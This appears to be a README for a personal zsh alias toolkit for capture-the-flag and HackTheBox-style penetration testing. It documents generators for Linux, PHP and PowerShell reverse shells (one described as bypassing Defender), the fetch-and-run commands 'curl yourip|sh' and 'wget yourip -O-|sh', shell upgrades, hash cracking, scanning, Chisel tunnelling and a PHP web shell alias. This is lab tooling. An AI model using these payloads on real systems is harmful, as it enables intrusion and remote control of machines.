Stuff for CTFs, HTB, THM etc

Contains aliases and scripts I often use. Just clone this repo in your home folder and run echo "source ~/zsh-aliases/aliases.zsh" >> ~/.zshrc. After restarting zsh you should be able to use all aliases and scripts. Only tested on Kali Linux, you might need to install additional dependencies on other distros.

#### Disclaimer

Most of those aliases probably suck, feel free to submit a pull request reducing the pepeganess. For me the fact that it works is enough to use them for now :D

Misc

> www

Starts a HTTP server on port 80 in the current directory. Also prints a list of the IP address associated with each NIC, shows the current directory path and lists the files. Example:

┌──(jazz㉿kali)-[/tmp/www]
└─$ www
[eth0] 192.168.172.128
[/tmp/www]
linpeas.sh  pspy64
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

#### Notes

- Sudo is used to ensure being able to listen on port 80

> tun0

Copies the IP address of the tun0 interface to the clipboard. Example:

┌──(jazz㉿kali)-[~/jazz]
└─$ tun0

Clipboard contents after:

10.10.14.41

> mkdir_cd

Often when making a directory I want to directly cd into it after. This does exactly that. Example:

┌──(jazz㉿kali)-[~/jazz]
└─$ mkdir_cd pepega┌──(jazz㉿kali)-[~/jazz/pepega]
└─$

Reverse shells

> gen_lin_rev $ip $port

Based on RSaaS. Creates a file called index.html in the current directory. This file contains multiple reverse shell payloads that will be attempted in sequence until one works. Can be used with www to make spawning a reverse shell after gaining RCE extremely easy and fast. Just make the target execute curl yourip|sh and it will retrieve the reverse shell payload from your webserver and -hopefully- connect back to your listener. Example:

┌──(jazz㉿kali)-[~]
└─$ gen_lin_rev 127.0.0.1 1337
[+] Wrote Linux reverse shells to /home/jazz/index.html

#### Notes

- I really like how the curl yourip|sh payload doesn't really have any badchars besides possibly the space and the pipe. When spaces form an issue there are ways around this and the pipe can be bypassed by just downloading and executing separately.

- If curl is not installed on the remote machine you can try wget yourip -O-|sh

> gen_php_rev $ip $port

Generates the PentestMonkey PHP reverse shell with the supplied ip and port and saves it in the current directory. Example:

┌──(jazz㉿kali)-[~]
└─$ gen_php_rev 127.0.0.1 1337                                                              
[+] Wrote PHP reverse shell to /home/jazz/jazz.php

> gen_ps_rev $ip $port

Generates a Powershell reverse shell with the supplied IP and port which at the moment of last usage bypassed Defender. I'm not sure who to give credit for this payload. Example:

┌──(jazz㉿kali)-[~]
└─$ gen_ps_rev 127.0.0.1 1337

Clipboard contents after:

powershell -ec JABUAGEAcgBnAGUAdABIAG8AcwB0A...

TTY upgrades

> uptty

Copies the python(2) and python3 tty upgrade command to the clipboard. Example:

┌──(jazz㉿kali)-[~/jazz]
└─$ uptty

Clipboard contents after:

python3 -c 'import pty;pty.spawn("/bin/bash")';python -c 'import pty;pty.spawn("/bin/bash")'

#### Notes

- Requires xclip to be installed

- py_tty_upgrade and py3_tty_upgrade are still included for now but will call this alias instead

> script_tty_upgrade

When Python is not installed on the remote machine you can use this command to copy the script method to upgrade to a tty shell to your clipboard. Example:

┌──(jazz㉿kali)-[~/jazz]
└─$ script_tty_upgrade

Clipboard contents after:

/usr/bin/script -qc /bin/bash /dev/null

#### Notes

- Requires xclip to be installed

> tty_fix

Runs stty raw -echo; fg; reset should be used after using one of the above tty upgrades.

> tty_conf

Grabs the current tty settings (number of rows and columns) and copies a oneliner to the clipboard that can be pasted straight into your reverse shell window to get those settings to match up. This fixes the issue of line wrapping occurring halfway in your terminal. Example:

┌──(jazz㉿kali)-[~/jazz]
└─$ tty_conf

Clipboard contents after:

stty rows 30 columns 116

#### Notes

- Requires xclip to be installed

Hashcracking

> rock_john $hash_file (extra arguments)

Instead of manually supplying rockyou as an argument with --wordlist=/usr/share/wordlists/rockyou.txt (without auto completion :/) this alias injects that argument and thus can be used to try and crack a hash using JohnTheRipper and the rockyou wordlist more easily. Example:

┌──(jazz㉿kali)-[~/jazz]
└─$ rock_john hash.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
jazz             (?)     
1g 0:00:00:00 DONE (2022-05-19 15:59) 100.0g/s 5376Kp/s 5376Kc/s 5376KC/s lynn88..ilovebrooke
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

#### Notes

- Kali seems to have fixed auto completion for John in 2022.2! This alias still saves you some effort though ;)

Portscanning

> nmap_tcp $ip (extra arguments)

Starts a TCP nmap scan with my default settings and outputs the scan results to an nmap directory which is automatically created if it does not yet exist. Example:

┌──(jazz㉿kali)-[~]
└─$ nmap_default 127.0.0.1
[i] Creating /home/jazz/nmap...
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-19 16:04 EDT
...

#### Notes

- This only scans the default TCP ports. Add -p- as an argument to scan all ports.

- Uses sudo to get the privileges required for a SYN scan

> nmap_udp $ip (extra arguments)

Starts a UDP nmap scan with my default settings and outputs the scan results to an nmap directory which is automatically created if it does not yet exist. Example:

┌──(jazz㉿kali)-[~]
└─$ nmap_udp 127.0.0.1
[i] Creating /home/jazz/nmap...
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-19 16:11 EDT
...

#### Notes

- This only scans the default UDP ports. Add -p- as an argument to scan all ports.

- Uses sudo to get the privileges required for a UDP scan

SecLists Path

#### Notes

- Many of the functions in this toolkit use wordlists from the SecLists project. To ensure these functions work correctly, the scripts need to know where to find the SecLists directory. The toolkit uses the following logic to locate SecLists:

First, it checks if /opt/seclists/ exists.
If not, it checks if /usr/share/seclists/ exists.
If neither of these directories exist, it looks for an environment variable called SECLISTS_PATH.

To set up SecLists for use with these scripts:

Install SecLists in one of the standard locations (/opt/seclists/ or /usr/share/seclists/).

Set the SECLISTS_PATH environment variable to point to your SecLists installation:

   export SECLISTS_PATH="/path/to/seclists"
   # You can add this line to your .zshrc file to make it permanent.
    ``
Web Fuzzing
> vhost $domain (-w wordlist) (extra arguments)
Performs virtual host discovery using ffuf.
Example:


┌──(22sh㉿kali)-[~]
└─$ vhost box.htb
> #### Notes
- When passing just the domain http will be used, you can however also pass in the full url https://box.htb for https
- Requires ffuf to be installed

> fuzz_dir $url (extra arguments)
Performs directory and file fuzzing using ffuf.
Example:
┌──(22sh㉿kali)-[~]
└─$ fuzz_dir http://box.htb
┌──(22sh㉿kali)-[~]
└─$ fuzz_dir http://box.htb -w /path/to/custom/wordlist.txt
┌──(22sh㉿kali)-[~]
└─$ fuzz_dir http://box.htb -fs 245
┌──(22sh㉿kali)-[~]
└─$ fuzz_dir http://box.htb -w /path/to/custom/wordlist.txt -fs 245
> #### Notes
- Requires ffuf to be installed

Chisel Tunneling
> chisel_socks $ip $port
Sets up a SOCKS proxy using Chisel and copies the command to the clipboard.
Example:

┌──(22sh㉿kali)-[~/jazz]
└─$ chisel_socks 10.10.14.10 8888
[+] copied chisel client -v 10.10.14.10:8888 R:socks in clipboard
2024/08/05 23:31:03 server: Reverse tunnelling enabled
2024/08/05 23:31:03 server: Fingerprint vasHkxo+4Ec2ahPgyQ8BNqQVXOCda9cmPmP7WXRdh44=
2024/08/05 23:31:03 server: Listening on http://0.0.0.0:8888
### > chisel_forward $local_ip $local_port $remote_ip $remote_port
Sets up port forwarding using Chisel.
Example:

┌──(22sh㉿kali)-[~/jazz]
└─$ chisel_forward 10.10.14.10 8080 127.0.0.1 8080
[+] Copied to clipboard: ./chisel client 10.10.14.10:8888 R:8080:127.0.0.1:8080
[+] Run this on the target machine
2024/08/05 23:32:30 server: Reverse tunnelling enabled
2024/08/05 23:32:30 server: Fingerprint x2iuHfzYVOWXL/7Gw0a6AjXhMIg8WP7AqZwlDuRasQw=
2024/08/05 23:32:30 server: Listening on http://0.0.0.0:8888
## Host Management
> addhost $ip $hostname
Adds or updates an entry in the /etc/hosts file.
Example:
┌──(22sh㉿kali)-[~/jazz]
└─$ addhost 10.10.11.234 big.box.htb 
[+] Appended big.box.htb to existing entry for 10.10.11.234 in /etc/hosts
10.10.11.234 boss.htb big.boss.htb big.box.htb

┌──(22sh㉿kali)-[~/jazz] └─$ addhost 10.10.11.235 newbox.htb [+] Added new entry: 10.10.11.235 newbox.htb to /etc/hosts 10.10.11.235 newbox.htb`

`Additional Aliases`

linpeas: Downloads the latest version of LinPEAS.

upload: Uploads a file using bashupload.com.

phpcmd: Creates a simple PHP web shell.

burl`: curl using burpsuite proxy.

--- Tranlated By Open Ai Tx | Last indexed: 2026-05-07 ---